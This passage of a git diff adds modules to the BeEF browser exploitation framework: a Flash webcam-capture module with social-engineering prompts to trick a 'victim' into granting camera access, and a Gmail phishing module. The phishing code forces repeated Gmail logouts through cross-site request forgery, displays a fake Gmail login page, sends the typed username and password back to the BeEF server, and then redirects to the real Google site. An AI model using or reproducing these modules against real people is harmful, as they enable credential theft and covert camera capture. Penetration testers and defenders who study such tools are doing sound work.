59, + 60, 61, -1, -1, -1, -1, -1, -1, + -1, 0, 1, 2, 3, 4, 5, 6, + 7, 8, 9, 10, 11, 12, 13, 14, + 15, 16, 17, 18, 19, 20, 21, 22, + 23, 24, 25, -1, -1, -1, -1, -1, + -1, 26, 27, 28, 29, 30, 31, 32, + 33, 34, 35, 36, 37, 38, 39, 40, + 41, 42, 43, 44, 45, 46, 47, 48, + 49, 50, 51, -1, -1, -1, -1, -1]; + public static function encode(data:ByteArray):String { + var out:Array = []; + var i:int = 0; + var j:int = 0; + var r:int = data.length % 3; + var len:int = data.length - r; + var c:int; + while (i < len) { + c = data[i++] << 16 | data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 18] + encodeChars[c >> 12 & 0x3f] + encodeChars[c >> 6 & 0x3f] + encodeChars[c & 0x3f]; + } + if (r == 1) { + c = data[i++]; + out[j++] = encodeChars[c >> 2] + encodeChars[(c & 0x03) << 4] + "=="; + } + else if (r == 2) { + c = data[i++] << 8 | data[i++]; + out[j++] = encodeChars[c >> 10] + encodeChars[c >> 4 & 0x3f] + encodeChars[(c & 0x0f) << 2] + "="; + } + return out.join(''); + } + public static function decode(str:String):ByteArray { + var c1:int; + var c2:int; + var c3:int; + var c4:int; + var i:int; + var len:int; + var out:ByteArray; + len = str.length; + i = 0; + out = new ByteArray(); + while (i < len) { + // c1 + do { + c1 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < len && c1 == -1); + if (c1 == -1) { + break; + } + // c2 + do { + c2 = decodeChars[str.charCodeAt(i++) & 0xff]; + } while (i < len && c2 == -1); + if (c2 == -1) { + break; + } + out.writeByte((c1 << 2) | ((c2 & 0x30) >> 4)); + // c3 + do { + c3 = str.charCodeAt(i++) & 0xff; + if (c3 == 61) { + return out; + } + c3 = decodeChars[c3]; + } while (i < len && c3 == -1); + if (c3 == -1) { + break; + } + out.writeByte(((c2 & 0x0f) << 4) | ((c3 & 0x3c) >> 2)); + // c4 + do { + c4 = str.charCodeAt(i++) & 0xff; + if (c4 == 61) { + return out; + } + c4 = decodeChars[c4]; + } while (i < len && c4 == -1); + if (c4 == -1) { + break; + } + out.writeByte(((c3 & 0x03) << 6) | c4); + } + return out; + } + } +} \ No newline at end of file diff --git a/modules/browser/webcam/dev/takeit.fla b/modules/browser/webcam/dev/takeit.fla new file mode 100644 index 000000000..7de9b071b Binary files /dev/null and b/modules/browser/webcam/dev/takeit.fla differ diff --git a/modules/browser/webcam/module.rb b/modules/browser/webcam/module.rb new file mode 100644 index 000000000..ad22db94c --- /dev/null +++ b/modules/browser/webcam/module.rb @@ -0,0 +1,63 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +require 'base64' +class Webcam < BeEF::Core::Command + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/takeit.swf', '/takeit', 'swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam/swfobject.js', '/swfobject', 'js') + end + def self.options + configuration = BeEF::Core::Configuration.instance + social_engineering_title = "This website is using Adobe Flashd" + social_engineering_text = "In order to work with the programming framework this website is using, you need to allow the Adobe Flash Player Settings. If you use the new Ajax and HTML5 features in conjunction with Adobe Flash Player, it will increase your user experience." + no_of_pictures = 20 + interval = 1000 + return [ + {'name' => 'social_engineering_title', + 'description' => 'The title that is shown to the victim.', + 'ui_label' => 'Social Engineering Title', + 'value' => social_engineering_title, + 'width' => '100px' }, { + 'name' => 'social_engineering_text', + 'description' => 'The social engineering text you want to show to convince the user to click the Allow button.', + 'ui_label' => 'Social Engineering Text', + 'value' => social_engineering_text, + 'width' => '300px', + 'type' => 'textarea' }, { + 'name' => 'no_of_pictures', + 'description' => 'The number of pictures you want to take after the victim clicked "allow".', + 'ui_label' => 'Number of pictures', + 'value' => no_of_pictures, + 'width' => '100px' }, { + 'name' => 'interval', + 'description' => 'The interval in which pictures are taken.', + 'ui_label' => 'Interval to take pictures in ms', + 'value' => interval, + 'width' => '100px' } + ] + end + + + def post_execute + content = {} + content["result"] = @datastore["result"] if not @datastore["result"].nil? + content["picture"] = @datastore["picture"] if not @datastore["picture"].nil? + save content + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/takeit.swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js') + end + +end diff --git a/modules/browser/webcam/swfobject.js b/modules/browser/webcam/swfobject.js new file mode 100755 index 000000000..8eafe9dd8 --- /dev/null +++ b/modules/browser/webcam/swfobject.js @@ -0,0 +1,4 @@ +/* SWFObject v2.2 + is released under the MIT License +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y0){for(var af=0;af0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad'}}aa.outerHTML='"+af+"";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab); +} + +beef.execute(function() { + document.title = "Google Mail: Email from Google"; + beef.browser.changeFavicon("https://mail.google.com/favicon.ico"); + logoutGoogle(); + displayPhishingSite(); +}); + +function clickedSubmitButton(){ + var credentials = "Username: "+document.getElementById('Email').value+" Password: "+document.getElementById('Passwd').value; + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+credentials); + //Timeout needed because otherwise the beef panel doesn't get the credentials in time + setTimeout("redirect()", <%= @wait_seconds_before_redirect %>); +} +function redirect(){ + var theXssUrl = "<%== @xss_hook_url %>"; + if(theXssUrl){ + window.open(theXssUrl); + window.focus(); + } + window.location = "https://accounts.google.com/ServiceLoginAuth"; +} + +function displayPhishingSite(){ + document.body.innerHTML = " Google Mail: Email from Google

Google Mail

A Google approach to email.

Google Mail is built on the idea that email can be more intuitive, efficient, and useful. And maybe even fun. After all, Google Mail has:

  • Lots of space

    Over 2757.272164 megabytes (and counting) of free storage.

  • Less spam

    Keep unwanted messages out of your inbox.

  • Mobile access

    Get Google Mail on your mobile phone. Learn more

Take Google Mail to work with Google Apps for Business

Love Google Mail, but looking for a custom email address for your company?
Get business email, calendar, and online docs @your_company.com. Learn more

"; +} diff --git a/modules/social_engineering/gmail_phishing/config.yaml b/modules/social_engineering/gmail_phishing/config.yaml new file mode 100644 index 000000000..5b9d80039 --- /dev/null +++ b/modules/social_engineering/gmail_phishing/config.yaml @@ -0,0 +1,25 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + gmail_phishing: + enable: true + category: ["Social Engineering"] + name: "Google Phishing" + description: "This plugin uses an image tag to XSRF the logout button of Gmail. continuously the user is logged out of Gmail (eg. if he is logged in in another tab). Additionally it will show the Google favicon and a Gmail phishing page (altough the URL is NOT the Gmail URL)." + authors: ["floyd @floyd_ch floyd.ch"] + target: + user_notify: ['ALL'] diff --git a/modules/social_engineering/gmail_phishing/module.rb b/modules/social_engineering/gmail_phishing/module.rb new file mode 100644 index 000000000..80f419ceb --- /dev/null +++ b/modules/social_engineering/gmail_phishing/module.rb @@ -0,0 +1,50 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Gmail_phishing < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + + xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" + logout_gmail_interval = 10000 + wait_seconds_before_redirect = 1000 + return [ + {'name' => 'xss_hook_url', + 'description' => 'The URI including the XSS to hook a browser. If the XSS is not exploitable via an URI, simply leave this field empty, but this means you will loose the hooked browser after executing this module.', + 'ui_label' => 'XSS hook URI', + 'value' => xss_hook_url, + 'width' => '300px' }, { + 'name' => 'logout_gmail_interval', + 'description' => 'The victim is continuously loged out of Gmail. This is the interval in ms.', + 'ui_label' => 'Ms Gmail logout interval', + 'value' => logout_gmail_interval, + 'width' => '100px' }, { + 'name' => 'wait_seconds_before_redirect', + 'description' => 'When the user submits his credentials on the phishing page, we have to wait (in ms) before we redirect to the real Gmail page, so that BeeF gets the credentials in time.', + 'ui_label' => 'Ms before redirecting', + 'value' => wait_seconds_before_redirect, + 'width' => '100px' } + ] + end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + + end + +end